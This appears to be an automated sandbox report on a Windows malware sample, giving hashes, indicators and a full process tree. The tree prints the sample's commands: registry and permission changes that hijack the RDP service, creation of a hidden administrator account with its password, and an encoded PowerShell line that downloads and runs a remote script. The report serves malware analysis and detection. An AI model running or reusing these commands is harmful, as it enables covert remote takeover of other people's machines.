Analysis
-
max time kernel
131s -
max time network
124s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
09-11-2020 21:35
Static task
static1
Behavioral task
behavioral1
Sample
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
Resource
win10v20201028
General
-
Target
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
-
Size
3.5MB
-
MD5
551466c49c45b71ee7b4d5a4fc0a800e
-
SHA1
be312273c1db869c5f23cc9ba24b31b66824a809
-
SHA256
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2
-
SHA512
1f4de516895870a74444b560df538259137900d73b78970926d7bebd0e759976630273e21c8cd6921aec85d614d6d305071cccf5c217762665e5e91d24694e4a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 7 1332 powershell.exe 9 1332 powershell.exe 11 1332 powershell.exe 12 1332 powershell.exe 14 1332 powershell.exe 16 1332 powershell.exe 18 1332 powershell.exe 20 1332 powershell.exe 22 1332 powershell.exe 24 1332 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 1640 icacls.exe 1740 icacls.exe 1360 icacls.exe 1104 icacls.exe 1664 takeown.exe 1668 icacls.exe 1844 icacls.exe 348 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1300 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 920 920 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1664 takeown.exe 1668 icacls.exe 1844 icacls.exe 348 icacls.exe 1640 icacls.exe 1740 icacls.exe 1360 icacls.exe 1104 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Windows directory 41 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b89a67b9-a1d2-441b-b091-fc4c72c733cc powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab61B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8B1.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8E4.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab914.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YVGEUJ8F4FQOB8SOHVY.temp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab55E.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab65B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8D2.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_853bbd5d-b68d-48ef-87bf-8de50817dd1c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9467568f-be88-49e8-aee1-12ed054c05a8 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_557f2bdc-7223-4bc4-a675-daed9c459a4f powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8E3.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e34d7a9e-8a76-4279-babe-2755e71e254f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a795cec-8d5f-4d97-9380-b62861a1a288 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b579aa51-24b8-4f1d-98f0-e5f386d98731 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar915.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar55F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar61C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8B0.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a4a4941d-999c-4ac6-ab08-c3f7b0939742 powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fdc397f2-6440-4171-adaf-145c73ae938b powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar65C.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_63fcdb2a-f6a1-4086-8d5f-39df79ec2181 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c3a95c74-743f-49cf-99c8-bdb70d2550ac powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab89E.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar89F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8D1.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80dc8a7e05b8d601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 1300 powershell.exe 1300 powershell.exe 1300 powershell.exe 1300 powershell.exe 1300 powershell.exe 1332 powershell.exe 1332 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 472 920 920 920 920 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1300 powershell.exe Token: SeRestorePrivilege 1844 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1152 WMIC.exe Token: SeIncreaseQuotaPrivilege 1152 WMIC.exe Token: SeAuditPrivilege 1152 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1152 WMIC.exe Token: SeIncreaseQuotaPrivilege 1152 WMIC.exe Token: SeAuditPrivilege 1152 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1512 WMIC.exe Token: SeIncreaseQuotaPrivilege 1512 WMIC.exe Token: SeAuditPrivilege 1512 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1512 WMIC.exe Token: SeIncreaseQuotaPrivilege 1512 WMIC.exe Token: SeAuditPrivilege 1512 WMIC.exe Token: SeDebugPrivilege 1332 powershell.exe -
Suspicious use of WriteProcessMemory 133 IoCs
Processes:
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exepowershell.execsc.exenet.execmd.execmd.exenet.exedescription pid process target process PID 684 wrote to memory of 1300 684 eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe powershell.exe PID 684 wrote to memory of 1300 684 eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe powershell.exe PID 684 wrote to memory of 1300 684 eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe powershell.exe PID 684 wrote to memory of 1300 684 eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe powershell.exe PID 1300 wrote to memory of 676 1300 powershell.exe csc.exe PID 1300 wrote to memory of 676 1300 powershell.exe csc.exe PID 1300 wrote to memory of 676 1300 powershell.exe csc.exe PID 676 wrote to memory of 860 676 csc.exe cvtres.exe PID 676 wrote to memory of 860 676 csc.exe cvtres.exe PID 676 wrote to memory of 860 676 csc.exe cvtres.exe PID 1300 wrote to memory of 1664 1300 powershell.exe takeown.exe PID 1300 wrote to memory of 1664 1300 powershell.exe takeown.exe PID 1300 wrote to memory of 1664 1300 powershell.exe takeown.exe PID 1300 wrote to memory of 1668 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1668 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1668 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1844 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1844 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1844 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 348 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 348 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 348 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1640 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1640 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1640 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1740 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1740 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1740 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1360 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1360 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1360 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1104 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1104 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 1104 1300 powershell.exe icacls.exe PID 1300 wrote to memory of 684 1300 powershell.exe reg.exe PID 1300 wrote to memory of 684 1300 powershell.exe reg.exe PID 1300 wrote to memory of 684 1300 powershell.exe reg.exe PID 1300 wrote to memory of 848 1300 powershell.exe reg.exe PID 1300 wrote to memory of 848 1300 powershell.exe reg.exe PID 1300 wrote to memory of 848 1300 powershell.exe reg.exe PID 1300 wrote to memory of 568 1300 powershell.exe reg.exe PID 1300 wrote to memory of 568 1300 powershell.exe reg.exe PID 1300 wrote to memory of 568 1300 powershell.exe reg.exe PID 1300 wrote to memory of 368 1300 powershell.exe net.exe PID 1300 wrote to memory of 368 1300 powershell.exe net.exe PID 1300 wrote to memory of 368 1300 powershell.exe net.exe PID 368 wrote to memory of 1620 368 net.exe net1.exe PID 368 wrote to memory of 1620 368 net.exe net1.exe PID 368 wrote to memory of 1620 368 net.exe net1.exe PID 1300 wrote to memory of 1908 1300 powershell.exe cmd.exe PID 1300 wrote to memory of 1908 1300 powershell.exe cmd.exe PID 1300 wrote to memory of 1908 1300 powershell.exe cmd.exe PID 1908 wrote to memory of 2036 1908 cmd.exe cmd.exe PID 1908 wrote to memory of 2036 1908 cmd.exe cmd.exe PID 1908 wrote to memory of 2036 1908 cmd.exe cmd.exe PID 2036 wrote to memory of 2016 2036 cmd.exe net.exe PID 2036 wrote to memory of 2016 2036 cmd.exe net.exe PID 2036 wrote to memory of 2016 2036 cmd.exe net.exe PID 2016 wrote to memory of 1504 2016 net.exe net1.exe PID 2016 wrote to memory of 1504 2016 net.exe net1.exe PID 2016 wrote to memory of 1504 2016 net.exe net1.exe PID 1300 wrote to memory of 1072 1300 powershell.exe cmd.exe PID 1300 wrote to memory of 1072 1300 powershell.exe cmd.exe PID 1300 wrote to memory of 1072 1300 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe"C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7149.tmp" "c:\Users\Admin\AppData\Local\Temp\niy0jjqs\CSC2F104AD658C14F50B898825C301F8E4D.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc wHLGRkc2 /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc wHLGRkc2 /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc wHLGRkc2 /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc wHLGRkc21⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc wHLGRkc22⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc wHLGRkc23⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
